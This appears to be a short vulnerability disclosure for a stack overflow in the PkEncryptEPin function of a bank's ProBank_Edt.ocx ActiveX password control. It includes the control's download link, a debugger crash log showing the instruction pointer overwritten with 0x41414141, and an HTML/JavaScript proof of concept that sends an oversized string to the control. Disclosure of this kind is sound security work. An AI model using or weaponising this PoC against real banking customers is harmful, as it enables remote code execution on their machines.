A software application in Industrial Bank can directly execute code remotely.
The PkEncryptEPin function of the ProBank_Edt.ocx control of the Industrial Bank has stack overflow.
This will cause stack overflow, and the EIP will be controlled, directly 0x41414141
Password control download link https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe
Crashinfo:
ModLoad: 03750000 03764000 C:\PROGRA~1\PROBAN~1\PROBAN~1.OCXModLoad: 73d30000 73e2e000 C:\WINDOWS\system32\MFC42.DLLModLoad: 61be0000 61bed000 C:\WINDOWS\system32\MFC42LOC.DLL(e10.1ec): Break instruction exception - code 80000003 (first chance)eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - ntdll!DbgBreakPoint:7c92120e cc int 3Missing image name, possible paged-out or corrupt data.0:016> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX - PROBAN_1!DllUnregisterServer+0x3127:03755197 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]0:008> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<Unloaded_pi.dll>+0x41414140:41414141 ?? ???
Vulnerability poc:
<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object><script>argv1="A"argv2="A"while(argv2.length<16384)argv2+=argv2ret = obj.PkEncryptEPin(argv1,argv2)</script>
Demo process
Install controls
Build a Web Service terminal and directly activate poc.html
The figure above shows the wingdbg crash information.
We can see that the eip is directly controlled 0x41414141, that is, the ascii value of the second parameter "".
Solution:
Strictly verify the input parameters